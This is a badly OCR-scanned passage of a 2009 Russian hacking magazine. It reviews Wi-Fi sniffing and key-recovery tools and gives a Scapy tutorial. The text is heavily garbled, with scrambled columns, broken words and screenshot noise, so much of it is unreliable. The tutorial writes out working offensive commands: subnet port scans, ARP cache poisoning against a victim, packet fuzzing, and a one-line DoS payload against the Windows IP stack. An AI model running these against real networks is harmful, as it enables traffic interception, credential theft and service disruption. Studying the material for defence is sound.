Если в ходе сканирования твой стамблер в колонке

ВасkТгасk:

.026

полезной для вардрайвера инфы и представить ее в виде

красивых графиков

Это не Только данные о точках досту­

па [5510], но и информациР. об использующих их клиентах

ХАКЕР

06 11261 09

••

~WlrelessKeyView

Eile

~dit

~iew

,:

!::lelp

0ОI122ЗЗ445566778899ааЬЬссddееff()()"



4е69725З6F66657231 З2333435

NirSofer 12345

I ШrSoft Freeware.

[~key(s), 1 Selected

http://www.nirsoft.net

WIRELESSKEYVIEW ПОМОЖЕТВОССТАНОВИТЬКЛЮЧИ ДЛЯ БЕСПРОВОДНЫХСЕТЕЙ, СОХРАНЕННЫЕВ СИСТЕМЕ [с указанием адресов отправки и назначе­

с полным

ний), а таюке [и это самое вкусное) самая

токолов (сейчас поддерживается более 701.

разная инфа, передаваемая В открытом виде

Более того

по сети: пароли для незащищенных прото­

ТСР-сессию и ПОClo10треть, к примеру, НТТР­

колов [pop3!ftp!te lпесl, почтовы й трафи к, htcp

I~~~ОО1»~~~.u;-~")r,"~ оо...'(Х,,"а,оо..:о:.11d5t )О.хх.ю:ili.1:ХХ,ю:

трафик со всеlo1И запросами и соответствен­

1:--­

кукисы и данные для авторизации,

но интересной инфой, вроде данных для

1~~:i~i~~~~,>I':fl.Lt>'J.1.24 ..tvr'.з

и т,д

Единственный недостаток

WifiZoo заключа­

ется в отсутствии режима

Channel

hорр,пg.

анализом

распространенных

L"L"~~~l-"U-""

про­

;.q.­

!i I)~ct:

можно полностью воссоздать

-

':)

-"р.

~

-1:_'

'H.

_.~,

..

ТСI':Ы.1».а".е.)JЮ~

_

...

ln.I6&.1.2....4m)

I ... Q<.n:lt",::.(/~""_~<1,,,,,It
__

J ~~~QO~{-~0?'~='S'Sl'C .. ОО-_'О:сХХ:3Jt.'(:.\Ххх,де.7

авторизации. Весь перехваченный трафик

1

может быть сохранен в файл для последую­

8 результате прога може'г прослушивать бес­

щего анализа. что особенно радует

это

проводной интерфейс, но не может прыгать

гибкая система фильтров, которая позволяет

с канала на канал. Этот недостаток с лихВой

отбрасывать ненужные пакеты и перехваты­

-

-ff ~IJ____ .._c ....... 8« ... Id......

i.~,.

~~Q.о~~~..жI~Dw~'.W'.:.:...:tb:>AJt.:!.IюшпL'tb.L4~dd'N

i'
вать только то, что нужно, А настраиваемые аfWSAPf<>jЩ.-Е'Q<'rU,()ftWttеleы.~I)'k.>d,'!Or "'eAt6D...

~_!!"!,,

~

(r~~(f~

OV~n;<~;«!

f,"jO:<;!

~J·,.,"":,,nl ~'~Jt~!

itJ~.r..<\';

11'''0.. _1:

~O

~},.o.~"I~, "P'~~~

,_11II.:

QIoOdO",6In.:4-'I

ЧЕННЫЕ С ПОМОЩЬЮWIFIZОО

1-kl91"~">

tl'/(II1~","II:51J

AV'""~rj>te
'''~ .~

1'JZlII

1'Io:><...... Io=00±

~IIXЦ



~2'"~ ...""~ ,..,:;==---=---,_,

.....

, Sti:!

0rbJ<

A~.

Ot:t!I:i

Ow.;"

компенсируется предварительнозапущенным

Кismet'o,~. Перехваченныеданные утилита

бережливо складывает в папку logsl. ука­

WSA

гию, которая в

использует техноло­

процессе восстановле­

акселераторы. Тут надо сказать, что 1,

.,~~--=~=·E=~:·~·,.,:,,". .~~ ?! ;:~:~::~~=

процессора,

ния ключа задействует графические

,

С!rщ.

СПЕЦИАЛЬНАЯВЕРСИЯСНИФЕРА COMMVIEW ДЛЯ РАБОТЫ В БЕС­ ПРОВОДНЫХ СЕТЯХ

ПРОСМАТРИВАЕМ ЧЕРЕЗ GШ­

И!НТЕрФЕЙС КУКИСЫ, ПЕiPЕХВА­

__ ~

'~~.'iii~

~~'~2mJOO.r'L2GRJ<:8~']

'::-:---------~._-----~:;,.:..

ПО ЗАЯВЛЕНИЮ РАЗРАБОТЧИ­ КОВ, СКОРОСТЬ ПОДБОРА WPA КЛЮЧАМОЖЕТВОЗРАСТИ В РАЗЫ, ЕСЛИ ИСПОЛЬЗОВАТЬ ВОЗМОЖНОСТИСОВРЕМЕННЫХ ГРАФИЧЕСКИХАКСЕЛЕРАТОРОВ

сама програМlo1а не

перехватыеает тра­

фик иэ беспроводной се'ГИ, а имеет дело только с дампом сетевых сообщений

[поддерживаются форматы TCPOUMP,

CommView. PSPR). Т.е работает в связ­ ке со снифером. Важно, что для уско­ рения вычислений подойдет вовсе не любая карта, а только топовые модели

ускорителей: NVIDIA IGeForce 8.9.200 и

вышеl или ATI (RADEON НО 3000 Series

зывая в названии файлов источник данных

и BbIIJJe)

(SSlds,log, cookles.log, hllpauth log и т,д.]. А

словарю и

EWSA поддерживает атаки по поддерживает реЖИI1Ы мута­

для большего удобства в комплекте идет

предупреждения поэволяют сообщать поль­

ции пароля Iнапри,~ер, слово password

GUI-интерфейс, реалv.зованныЙ в виде веб­

зователю о важных событиях, таких как подо­

за,~еняет на plassword и т.д.)

сервера, который по Уlo10лчанию поднимается

зрительные пакеты, высокая загрузка сети

на

или неизвестные адреса. Словом, вам отлич­

127.0.0 1:8000.

~Iая программа для винды за исключением

COMMVIEW FOR W'1F.1

www.tamps.ru ,. products/commwlfl Специальная версия известного виндовоrо снифера

CommView, созданная для захвата

одного

-

она платная.

~1~~~i~~~fY~~~tlц t il sl wlreLess_key.htmL

Уже са м не раз сталки вался С

WIRELESS AUDIТOR

SECURIТY

собственной Точки доступа. Кажется,

www.elcomsoft.ru

это была строчка из Лермонтоеа? Черт,

и анализа сетевых пакетов в беспроводных

Еще одна платная, но очень любопытная

или Пушкина? Не помню

сетях 802 l1a/bIg/n. Утилита получает инфор­

разработка

освежить

Wlreless Sесuпtу Audltor

паlo1ЯТЬ

позволяет проверить надежность (да,

и сразу декодирует анализируемыеданные,

теперь ато так называется'

отображая их G удобном для переваривания

WPA2, но используя современные Io1ETO­

WPA

виде. В случае необходимости, пакеты можно

ДИКVI для вычислений

работает как с сервисом

дешифровать с использованием пользова­

фических процессоров.

тельских ключей

режиму,

WEP

или

WPA-PSK

и деко­

дировать вплоть до самого низкого уровня

ХАКЕР Qb

1126/ Q9

дится

когда

С помощью

гра­

В дополнение к

восстановление

средствами

WPA!

только

ПрОИЗEiО­

центрального

Моментально

помогает утилита

мацию от беспроводногосетевого адаптера

.JI

cVlTya­

цией, когда тупо забываешь ключ от

WlrelessKeyView. которая ebITacKVlBaeT из реестра сохраненные в системе WEP! ключи, Приятно, что

WlrelessKeyVlew Wlreless Zero

Conflguration в W,nXP, так и WLAN AuloConflg, Висты.

KOTOPЫ'~ пользуются юзеры

I

~

027

5[АРУ

х

х

х х

J

5[АРУ

х

х

5[АРУ

xEEi8 СТЕПАН «ST~» И~,~~Н

~АБОТА

ХEEi8

J

х

еоеКАЛЬПЕЛЕМ РАЗБИРАЕМСЯСУТИЛИТОЙSСАРУ Как можно воплотить снифер, фазер и конструктор пакетов в одной утилите? Создатели Sсарудоказали, что это возможно. Работа через текстовый интерпретатор, возможно, испугает большинство пользо­ вателей. Но мы, освоив простой синтаксис, сможем ей одной заме­ нить множество специализированныхутилит.



Основное назначение Scapy - мани пулиро­

зоЕателем осуществляется ",е 4ерез ключи

лиззции известных приемов, способных заме­

вание пакетами. Ноэти функции реализованы

в кома",д",ой строке, а через и",терпретатор

нить массу других утилит, Тут надо сказать, что

настоль толково, что вкупе с используемым

Python'a. Необыч",ый подход сначала может

прога изнзчально написана для никсов, и под

интерпретатором Python, можно выполнять

смутить, но когда разберешься с простым

тем же Llnux'oM запустится с пол пинка, а вот

ряд самых разнообразных задач: начиная от

синтаксисо,~ и осознаешь, 4ТО к твои,~

для ИСПОЛЬЗ0ва",ия виндового порта придется

банального сканирования портов и закаН4И­

услугам предоставляется еще и вся мощь

чУ1Ъ попыхтеть.

вая сложными приема ми для определения

Python'a, вдруг понимаешь' «А еедь удобно,

Первое, что потребуется, -

инфраструктуры сети. В итоге получаем

черт подери l И как это другие до этого не

ный в системе интерпретатор

одну еди нствен ную утил иту, которая может

додумалисы >..

надо спешить и ска4ивать самый последний

заменить такие известные тулзы, как

nmap,

релиз. Во-первых,

это устаНОЕлен­

Python. Тут не

Scapy написан на второй

arpspoof, arp-sk, агрiпg, tcpdump, tethereal,

СОВЛАДАЙ С ВИНДОЙ!

pOf. И бол ее того - готова подстроиться под

Чтобы не грузить тебя теорией, предлагаю

бовать запускать ее на последнем З.х билде. А.

са м ые спеЦИфИ4еские ситуаци и.

сразу взять быка за pora и разбираться с про­

во-вторых, для корретной работы програм,~ы

Вообще, Scapy сильно ОТЛИ4ается от многих

граммой на конкретных при мерах С",ачала мы

придется установить несколько дополнитель­

других утилит Она работает в текстовом

разбере,~ся, как просто составлять и отправ­

ных модулей. некоторые из которых имеют

окружении, однако взаимодействие с поль­

л\пь пакеты в сеть, а потом посмотрим на реа­

портированн ые версии только для

~

028

ветке Рythоп'а, а поэтому можно даже не про­

2.5 релиза.

ХАКЕР

06 {1 26/09

х

х

х

S[RPY

качестве примера создадим TCP/IP-пакет для

22 порта. »> a=IP ( »>

ОБЩЕНИЕСО SСАРVО(УЩЕСТВЛЯЕТСЯЧЕРЕЗ ИНТЕРАКТИВНЫй ИНТЕРФЕЙС, РЕАЛИЗОВАННЫЙС ПОМОЩЬЮИНТЕРПРЕТАТОРА


1>

>>> а.Ш

PVTHON

(1)

а

[21

64 >>> a.ttl=32

(3)

нительных модулей, 4тобы открыть пару

»>

дополнительных возможностей Scapy.

<1Р

Подробнее о них можно прочитать во врезке.

»> b=TCP(dport=22}

ПЕРВЫЙ ЗАПУСК

а

1>

tt1"'32

»>

с=а!Ь

>:»

с

После установки в системе будут прописаны


ассоциации для запуска Руthоп-скриптов, позто­

1<ТСР

(4)

(5)

frag=O tt1=32 dporl=ssh

proto~TCP



му можно просто перейти в папку со 5сару и в

командной строке набрать: scapy.py [или pytnon

Сначала

~I. Как я уже сказал, не стоить ждать под­

пляр I Р-пакета и сохраняем его в перемен­

сказки со списком ключей для запуска

ную а. Важно, что все зна4ения IР-пакета

-

вместо

11) действием мы создаем экзем­

-

зтого ты окажешь внутри текстового окружения.

выставляются по умолчанию

По сути, это интерпретатор Руthоп, сдобренный

сама Scapy. Причем зна4ения по умолча­

специальными функциями

нию не отображаются пользователю далее,

Scapy.

Можешь вве­

зто делает

сти команду l5[]. после 4его оБОЛ04ка должна

когда он просит интерпретатор вывести его

вернуть список протоколов, с которыми она под­

пара метры. Посмотреть значение нужного

поля можно, обратившись к атрибуту нуж­

держивает работу:

ного обьекта

[21

Изменим его на значение

32 i3! и с помощью следующей команды

»> 1s( ARP

ARP

убеДИМС51, что ИЗМ'енение прошло успешно

воотр

ВООТР

Далее создадим ,еР- слой, ПРИСВОИ8 его

DNS

DNS

переменной Ь и установив значение поля

dport [порт назначения] равным 22 Далее слепим вместе переменные а и Ь, используя

оператор!, чтобы получить готовый тер! Если версия будет отличаться, их инсталлятор

необходимо понять для себя несколько

IР-пакет, к которому можно обратиться

l)'по обломает тебя с установкой, сославшись

вещей:

4ерез переменную С. Заметь, что некоторые

на отсутствии в системе нужной сборки питона.

1. Каждый пакет - это обьект, у которого есть

поля IP автоматически ПОМНIЯЛИ значе­

Небольшие манипуляции IЗ реестре могут помочь

поля-атрибуты для редактирования, а также

ния, чтобы инкапсулировать тер-слой. Тут

ЭТО побороть, но никто не гарантирует даль­

методы для различных действий с ним.

стоит сказать, что значения полей вовсе

нейшей 100% совместимости. Короче говоря,

2. Scapy может работать на разных уровнях

необязательно должны быть корректными

чтобы все прошло гладко и далее работало беэ

модели 051· втором и третьем. Важно пони­

-

проблем, рекомендую тебе следующий наБОР4ИК

мать. что данные с запросом ONS сна4ала

одного или нескольких полей,

[весь он, само собой. есть на нашем DVD),

инкапсулируются внутрь UOP-пакета (потому

просто получаем ГОТ08ЫЙ фаэзер [о фаззинге

указав заведомо неверное значение для

мы очень

• Собственно сам Scapy для винды;

как протокол DN5 используетдля передачи

поговорим нижеl! В конце КОНЦО8, никто не

• Pytnon 2.5Iw'NW.python.org);

данных UDP). далее уже UDP-пакет инкапсу­

заставляет создавать Ку4у переменных для

• расш и рения интерпретатора PYWI п32

лируеТС51 внутрь IР-пакета, и в конце концов

каждых слоев, все можно уместить

I

зта сборная солянка размещается внутри

одной строки:

tnОП.пеl crew mllammond v"iп32],

• драйвер для перехвата па кетов WinPcap

Еthегпеt-фрейма

4.02 ['V'Nw.wiпрсар.ог.g);

чем СТОИТ помнить, когда работаешь со 5сару.

• рурсар - модуль работы с драйвером Рсар

8

рамках

Получается слоеный пирог, О

Наш первый сетеваой пакет, как и все

a=Ether ()

ПР

(dst= "'i-1w,,]. xaJ;.ep. r'u) /

TCP()!"GET !index.htm1 HTTP/l.O

[code. 9009 le. сот!р!рурса pl;

остальные, разделен на слои, и каждый слой

• libdnet Icode.google.com/p!libdnetl;

гl редставляется в Python!Sca ру ка к зкзем­

• pyreadline Iiруthоп.sсiру.огg!rт1Оiп/

пляр обьекта. Мы можем создать обьект для

в зтом прим~ре мы добавляем еще один

РуRеаdliпе/1пtго];

каждого слоя, опционально задать некоторые

СЛОЙ

Помимо этого можно установить ряд допол­

параметры и обьединить их в один па кет. В

фреймы Etnernet.

ХАЦР

06 1126/ 09

\п\n"

-

канальный, на котором передаЮТС51

~

029

х

»

pc_zone

IEthenIot11

х

I~~

'УР<



~

(]в

vt!1~ioo

.101

,,,".,. 1D,t "" ,,'

warning

,..to

При всем функцио­ нале, надо признать,

что у

Scapy есть

и ряд

недостатков, Прежде всего, стоит помнить, что тулза

Python

... ап исана

с несколькими

ции, и работает это

очень быстро,

Скорость передачи

пакетов В 6 Мбит/с

-

Of)t1o:.s

~ "М ,,,,,"'"

("1\11.",,,,

~

jnit.oooki~

на

уровнями абстрак­

... е

..,

<:Ilbufll

пожалуй, верхний

предел. Болеетого,

Ir~p.cooloj~ ~1
txC~,type fl~~

"

Itngth

РЕЗУЛI:)

IISAKMtJ ра,tо.юl 'Ii:!xt.p.oylo.ad

ТЗО-МОДЕЛИРDВАНИЯ

TRACEROUTE'A

~

klrlJl.l1

"'"

ВИЗУАЛИАЗАЦИЯIlЕРЕХВАЧЕННЫХ

ДАННЫХСТАНОВИТСЯДОСТУПНОЙПО(Л~

УПАНОВКИДОПОЛНИТЕльныхмаДУЛЕИ

всем возможным и интересным для

нас назначеНИАМ.

Если пройтись по портам назначеНИА ТСР, то получаем

различного рода сканер тер-портов, в зависимости от

в случае работы с

СТвом па кетов может

СОЗДАЕМ ПОСЛЕДОВАТЕЛЬНОСТИПДКЕТОВ

лять пакеты на удаленный IP-аАрес по

потребоваться много

Ровно как и обычный пакет, несложно создать и после­

ARP, получаем соответственно ТСР-J'ИНГ,

памяти,

довательности пакетов. За примером использования

IСМР-пинг и АRР-пинг. А если сканировать значеНИА

далеко ходить не нужно, ведь создав последовательность

TTL,

ТСР-пакетов на различные порты, МЫ получаем ГОТОВЫй

сделать очень многое, и все завиоп от твоего вооб­

порт-сканер, И от этого лишь радужнее тот факт. что

ражения.

большим количе­

флагов. которые будем отсылать в па~ете, Если отправ­

ICMP, ТСР или

то получаем утилиту traceroute. Словом, можно

последовательностьпакетов можно созда1Ъ одной строч­

~

кой, указав для конкретного поля не значение, а массив

ПРИЕМ-ОТПРАВКА ПАКЕТО8

из нескольких значений Пакеты, созданные подобным

Как конструировать пакеТы из нескольких уроаней, мы

образом, называются неявными.

разобрались, Теперь осталось за маЛЫf,

dvd

- отправить

пакеты в сеть И. возможно, получить на них ответ. Как я

8се, что нужно для

»> pkLs =

работы СО

найдешь на нашем

»> pkts


ОУО. Там же будут

proto=TCP 1<'ГСР



при меры сценари­

»> (pkt for pkt

:Сп

Scapy, ты

уже сказал выше,

IР(tt1=[l,З,5,(7,10)))!'l'С['(

З,

5,

пакет на З уровне: она сама выберет нужный интерфейс и варианты роутинга, В качестве пара метра надо указать

pkts]

frag=O

се1=1

proto=TCP

I
1»,

приемов(напри­


frag=O

tt1=З

proto=TCP I
1»,

mep,DNS-спуфи ... г],


frag=O tt1=5 proto=TCP

I<'ГСР

1»,

а также примеры


frag=O ttl=7 prot,o=TCP

I
1»,

Руthоп-сценариев


frag=O tt1=8 proto=TCP

I
1»,

С использованием


frag=O 1::1::1=9 proco=TCP 1<1'CP

1»,

Sca ру как модуля,


frag=O tt1=10 proto=TCP 1<тср

1»)

в итоге получаем семь ТСР!lР·пакеТОЕ с ПL 1, 3, 5, 7. 3. 9 и 1О,

пакет или переменную С уже сконструированным

sелd (IР (аз!;=" 1.

2.

З.

4")

псмр

() )

выбор правильного интерфейса и протокола будет на тебе 5ЕND(IРID5Т=»1.2.З.4»)/lСМРIJJ sелdр(Еthеr(}/

IP(dst="1.2.3.4".tt1=(1,4)),


frag=O prot.o=ICMP dst=
2.*>

I


пакетом:

Функция sendpl) работает на втором уровне, поэтому

»> IP(dst="192.168.*.1-10")!IСМР( }

»>

051, для каждой из них 'использу­

еТСА своя функция для отправки Функция sendlJ отправит

17,10))

[
ев для различн ых

Scapy может работать на двух разных

уровнях сетевой модели

iface c "eth1")

Sent 4 packecs.

С помощью де САТИ созданных IСМР-пакетов мы простым

Тут надо сказать, что на практике гораздо чаще встре­

Пингом сканируем первых деСАТЬ адресов каждой из под­

чаются ситуации, когда нужно не только отправить

сетей

пакет, но и ПрИНАТЬ ответ от удаленной стороны

192 163.

Поэтому в 5сару разумнее использовать специальную

функцию для отправки [send] И приема [reCleve] пакеТ08

»> IP{dst='192.168,4.0!24")/

sr[J. Эта функция возвращает два набора' первый -

TCP(dport=(O,1024) )


frag=O

ртоСо=ТСР

192.168.4.0124>

I
dst=
Gport=(O. 1024}



второй

-

набор пакетов. ответы на которые не были

получены. ДругаА фУНКЦИА sr1 Всего одна cтpo~a нужна, чтобы выполнить ТСР

~

030

из

отправленных пакетов и полученных на них ответов:

SYN

[1 является вариацией

первой с той лишь разницей, что принимает только

всех привилегированных портов [от о до 1024] в под­

один ответный па кет. Надо сказать, что эти функции

сети 192.168.4 0/24, По сути, для любого сканирования

работают на третьем уровне, поэтому и пакеты ДОЛж­

нам надо взять ~a~oe'TO ~OH~peTHoe поле И пройтись по

ны быть соответCI'ВУЮЩих протоколов [IP, ARP! Если

ХАКЕР

06/1261 09

х х С:\WINООWS\systеmЗ2\сmd.ехе . sca~y.py

" len

: S)lo1'tField : >:S}lol'tField

с})ksшrl

'" '"

.

(Нопе>

(Нопе)

» ) anS,l.tnan$ =:a'p(Et}lel'(d~t="ff:ЕЕ :ЕЕ: ЕЕ OLLt ..2)

egin

eAi~sion:

Fini~)led

to

~end

:ЕЕ

:ff")/A

256 pac)(ets.

H~~~ :i~~d' 256' ~~~kets,

»>

got [1

флага А. Далее легко получаем список

Получаем ответы на широковещательный

открытых портов из массива с принятыми

АRР-запрос и выводим результат в удобо­

ответами:

читаемой форме.

»> [or s.r in

an~mel'S, l'CRdin ing 256

Finis})cd to send 256 packets.

.. *.*

"

•••••••••••••••••• .м-.

Receiucd 260 packet::;:, got 4:

»>

ans.sttMJ!lёl.1"y(lan1:H:\a

>>>

an~H'Cl'S,

psrc%")

stг(s[ТСР).dроrt)

+ " в Scapy есть уже реализованная функция arpingll, которая реализует тже самое В каче­

is unflltered"

I'cnaining 252

НОЙ ARP PING'A

(S,r):

r.sprintf("%Ether.src% %ARP.

($,1'): 1'.spl'intf(";;:EtJIC1'.$l'

192.168.56.1 192.168.56.2 192.168.56.128 192.168.56.254

РЕЗУЛЬТАТ ТОЛЬКО ЧТО СОЗДАН­

/

ans.summary(lambda r(TCP]

sport;

.

. .. print @@,5@,56,cO,OO,OS 00'50'56'.h'f?'?a ОО,Ос ,29 'd6 ,91 ,о. 00'50'56 '.7'Ьа'67

апв:

if s[TCP] .dport

аПS,l.шаПS"'Sl'р(Еt}lе1'«(\st="ЕЕ:ЕЕ :ЕЕ: ЕЕ :ЕЕ :ff")/A

Begin ClТli~Gion:.

Если ответ не получен, вероятно, порт

стве параметра ей необходимо лишь указать

закрыт Поэтому просто отображаем на

сегмент сети:

экран номера портов иЗ запросов, на кото­

вариант

рые ответа не последовало:

банаЛЬfiО nрОП!Анговать каждый узел в задан­

arplng[,,192.168·1 '»1 Другой найти апивные хосты В сети ­

ном диапазоне, что легко выполняетс\! коман­

»> for s

ты хочешь спуститься до второго уровкя И

/'

оперировать fiапрямую пакетами

802.3.

Ethernet.

~n

print str(s['1'CP]

есть фуfiКЦИЯ sгрl]

дой, отправляющей в сеть IСМР-запросы:

unans: .dроп)

+

"

is filtered"

»'>

ans.unans=sr(IP(dst="192.168.1.]­

=-'.\

МУТИМ СКАНЕР ПОРТОВ

ПОИСК ЖИВЫХ ХОСТОВ В СЕТИ

Теперь, когда мы умеем отправлять и при­

03-

Еще одна конкретная задача

варианты использования Scapy. Начнем со

активные маUJИНЫ в локальной сети. Самый

сканера портов. О том, как сгенерировать

быстрый способ

пакеты для ТСР-сканирования портов, мы

ARP

уже говорили

уже готовая утилита

Давай посмотрим теперь, как

-

-

найти осе

arpingl.

Напомню. что

<'

»>

аПS.sumюагу(lаmЬdа

ICMP

блокируется, можно

попробовать использовать различные ТСР Рiпg·и, например, с помощью ТСР

.'

IP(dst="192.168.1.*")/

TCP(dporc=80,flags="S")

PDF: .~".

::".-"

SYN:

»> ans,unans=srl

2D-графики и экспортировать их формат

»> p=IP{) ПСМР()

(s,r):

r.sprintf("%IP.src% is alive")

Если в систему дополнительно установить рух и MikTex;'fO $сару позволит пщ:троить =зу-

~--:­

Любой ответ будет означать, что узел активен.

»> p·;pdfdump (<
АRР-СПУФИНГ

." -:М:

с ответами·

Если протокол



модули Ji~RJI~ ~",

Список живых ХОСТОВ получаем из массива

использовать метод

Рiпg'а [оБЫЧfiО для этого используетс\!

Допол"н'ител bHble

~>IТ

254")псмр()

нимать пакеты, разберем конкретные

процесс передачи IIaKeTOB можно отобразить и в виде 3D-диаграммы. для этого потребуется

Не составит труда и использовать клас­

VPython и следУ19Щая команда:

сический прием

--'"

,

-_..-

_.~.,

't...-.' '=,.-...... _'..

.

Т'

»> а, u=traceroute ( [«www.python.org».«google .. com» ,»slashdot ·.oi-'g»"1 У' .~. »>

а. сгасе3О

роisопiпg,

о которым мы вспоминали букваЛЬfiО в предыдущем номере, в статье "Вскрываем

SSL».

()

ARP cache

Смысл в том, чтобы путем засорения

АRР-кеша клиеfiта, заставить ег·о в ,(аче­

у ScapyHeT встроенных функций для опред~ения типа ОС на удаленном хосте, но зато есть

стве шлюза

возможность использовать всю мощь утилИ"Г

гой узел

Nrnap и Queso (их предварительно нужно уста­

использовать

совершеfifiО

вепд(

»> nmap_fp(<<192.158.0.1»)

»>

Беgiп

ARP(op="who-hаs",

emission:

~

рдs

Finished to send 8 pacKets.

t

=с1

Etherldst=c1ientMAC)/

psrc=gateway,

ient) ,

inter=RandNum(10,40).

Received 19 packers, gor 4 answers, rernaining 4 packets 0.88749999999999996, ['DraytekVigor 2000 ISDN rourer'])

Впрочем,

-у' ..... :

объединить это с обрабол(ой результата.

протокол

из

Сканирование с помощью АСК-пакетов

определения

легко реализуется командой:

IP-аАресу. Смысл

sr

)

позвол\!ет не заморачи­

функцию агрсасhерОlSОП

-ов

16/09

Scapy

lоор=l

ваться и использовать уже реализоваНfJУЮ

()

»:>

дру­

где мы легко можем установить

Сfiифер Делается зто так:

новить в систему:

")

-

аПS,uпапs

(IР

:::

(dst= "'f/WW. xakep.

сою")

ХАКЕР оь 112М

09

fiaM

дает использоваfiие

IJ,

указав в каче­

используется в сети для

стве первого параметра свой МАе-адрес, а

МАС-адреса по заданному

в качестве второго

ARP

- IP

жертвы,

Рlпg·а заключается

в том, чтобы спросить все хосты в локаль­

FUZZING

ном сегмеlне их IР-адрес:

Ca~~ прием фаззинга прост, как дважды два: "подставить в каком-нибудь месте такое

/

TCP(dport=[80,666J ,flagS="A")}

Нужный эффект

ARP

fie

»> ans,unans=srp(Ether(dst="ff:

Зfiачеfiие, которого быть

ff:ff:ff:ff:ff"}/ARP(pdst="192.16

треть, что будет». Скажем, если флаг в

8 . 1 . 0/24" ) , timcou с =2 )

каком-то

поле пакета

может, и поо~о­

может принимать

~

~

~'\'Y

v"

зна­

031

х

....

...... pc_zonl?

----7

[]равка

:

о

ПQ.'1СК

18!i3

-

~A

1SOдировки

~ННT8К(HC

,(Е X/i._06J'C20NЕ_RA80ТАЕ"1...SQ_St:.(lЦ'j;фJ.!Ш .ч! IlJsr/bln/env зсару

:fl'om DB

Оny,НН

,.,laKpOCbI

запуск

TextFX

ДОn01D1et1ня

O~

-о :"Q ~ ~ It~ 1!1 ~ е 11!! Св ~ ~ ~ 6 I~ 'п GБо p,/1hOn

iJnport

IIIE 08'6' 2 ~

@

1

00 [Е ~ Ii

1<§\

d

l::J '~

.,ping.py

'*

= ()

г

5carpwatch_callback(pkt): i:f АЙР in pkt.:

;р,= = plcO [ARP] . рзrс, plcO [ARP] • Ь~эrс

7

8

i..=f



I



11

13

16 17

18

te.rget =-



p,kt.[ARP]

atcec:J;;:

.pd~t

t.C:H=get.::<~s

mзс)

(target, ip, else: DB[ip]~mac ~

(Rl8c,ip)

eli:f' IP in pkt.: S1p,d1p = plВ Ot.' d1p not :in DБ:

ret.urn

21

1:f :E.t.hec in pk't:

22 23 24

зmаС/~ас

eJ.i:f

25 27

ПИШЕМ

х

"~:$?"

"poi~l')ning

retUl"n

19 20

х

.dзt

else:

i



DБ:

i:f Etbex: in pxt: t-e.rqet pkt (:fther)

~

12

i.n

;;f ..ас 1= DB[1p]:

=

рk~[Еt.hеr].эrс,

рkt(Еthеr].dЭ~

Do~l1

in р)сС: рll = p!l:t.[Dool1] i:f pll.FCfield & 3 == О: #di,ec1 sznac,dlnac ~ pll.ad.dr2,pl1.sddrl

ARP МОНИТОР,

ПОДКЛЮЧИВ

чения 1,2,3. то можно послать 5 -

~I

SCAPY КАК МОДУЛЬ PYTHON'A

и отследить реакцию.

Как среагирует на такую подставу демон? А как клиент? В

0001 Ether / rcquest

О

IP /

ICMP 192,168.5.21 echo­

/ Raw

при~щипе некорректные значения можно f'lодставлять и

~

links

• в е рсия SCQ ру для

IЗручную, однако для большего удобства в Scapy реализо­

Обрати внимание, что отправку па кетоlЗ и снифинг можно

вана функция fuzz[), которая преобразует любой коррект,

провести всего один раз, а отваты и резупьтат снифинга

ный пакет в пакет, специально заточенный для фаззинга.

присвоить переменной, после чего делать с кей все что

Фишка в том, что функция автоматически заменяет все

угодно. Столысо раз -

поля [кроме случаев. когда значение поля должно быть

I~ИНИМУМ активности, которая кас может спалить, и макси­

мум возможностей по интерпретации

например, поля с КО~IТРОЛЬНЫМИ суммамиl

сколько потребуется. Получаем

IPv6:1.1..9.-n:blpiiru.

подсчитано -

hrшgо.widе.аd.jр/

случайными значеliИЯМИ, но подходящими по размеру

перехваченные пакеты мы помещаем в массив а, и теперь

~

для этого поля, Разберем при мер:

можем обратиться к пюбому па кету, просто указа в его

8

нашем примере

индекс к примеру, а[1]. Метод пsummагу[l, как видишь,

• Uпit-тестирование

»> send (IP (dst=" target") / fuzz (UDP () /

выводит общую характеристику перехваченных пакетов.

для Scapy: secdev.org!

N'ГР

Перехваченные данные в некоторых случаях удоб­

("ersj.on=4) ) , 100р=1)

RIQj.~_c;ts!UTsca ру.

нее просмаТРИВдТЬ и анализировать в удоБНОl4

в этом случае IР-слой будет самым обычным, в то время как дЛЯ

интерфейсе того же

GUI­

Wireshark·a. Для этого перехвачен­

• Инжектирование

UOP и NTP [это, кстати говоря, протокол сетевой синхронизации

ные пакеты рекомендую сохранить в файл в формате

паl<етов в Wifi:

времениl будет использовать фаззинг. Причеl~ контрольная

РСАР: wrpcap(<
sid .rstack.org!indg~

сумма в UDР'пакете будет корректной, в Кдчестве порта будет

ществляется так. pkts

®..QLw.ilitQQ EN.

использоваться порт 123 [стандартный дЛЯ NTPI, а версия NTP

=

rdpcapl«lemp.cap»I.

будет установлена на 4 [Т.к. она явно задана при соэдании паке­

РАЗ ПЛЮНУТЫ

та!. Остальные поля будут заполнены случайными значениями.

Самая главная фишка Scapy в том. что она позволяет обойтись без написакия новой утилиты. Если для напи­

СНИФИН:Г

сания Proof of еопсерt для DoS'a MicrosOft'OBCKOro стека

Не даром мы устанавливалиWiпРсар и модуль для работы

IP требовалось 115 строчек на С, то в Scapy это можно

с ним: В

реализовать всего лишь одной строкой:

Seapy реализованы отличные возможности для

снифинга данных. Основная функция - snift 1], в качестве параметров которой можно указать интерфейс для про­

send(IP(dst="target",options="\x02\

слушки, задать фильтр и количество па кетов для перехва­

х27

" +" Х" * 3 8)

/ТС1? ()

)

та. Если интерфейс не указан, снифинг производится по всем интерфейсам сразу. Вот так просто fЮЖНО перехва­

С помощью Scapy реально сотворить все, что угодно Хочешь

тить IСМР-трафик, связанный с ХОСТOI166.35 250.151:

сканер портов с нужной тебе логикой

- легко добавить

возможность flпgегргiпt'а? Раз плюнуть. А впрочем, почему

»> sniff(filcer="i.cmp

апd

hosc

соuщ=2)

батывая пакеты, можно легко сварганить уникальную IDS­

<Sпiffеd:

ТСР:О

систему с триггераl1И на любые события. И самое главное ­

»>

UDP:O

ICMP:2 Other:O>

сделать это очень просто. Скажу больше -

а=

0000 Ether / requesC

032

О

IP /

/ Raw

никто не обязыва­

ет тебя постоянно работать череэ интерпретатор. Seapy очень

»> a.nsummary()

~

использовать его только для пентеста? Перехватывая и обра­

66.35.250.151",

ICMP 192.168.5,21 echo­

просто подключить к своему Pythоп-сценарию как модуль и

использовать все ее возможносги на всю катушку! I

ХАКЕР

06 /1201 09

Что объединяет Гарри Поттера и Джонни Деппа7 Героев мультфильма «Ледниковый период» и ретро-боевика «Джонни д» 7

в каЖДОМ номере

DУD с полнометражным

фильмоМ

Все они ждут тебя

в юбилейном номере

100-ый номер журнала

Total DVD!

Total DVD

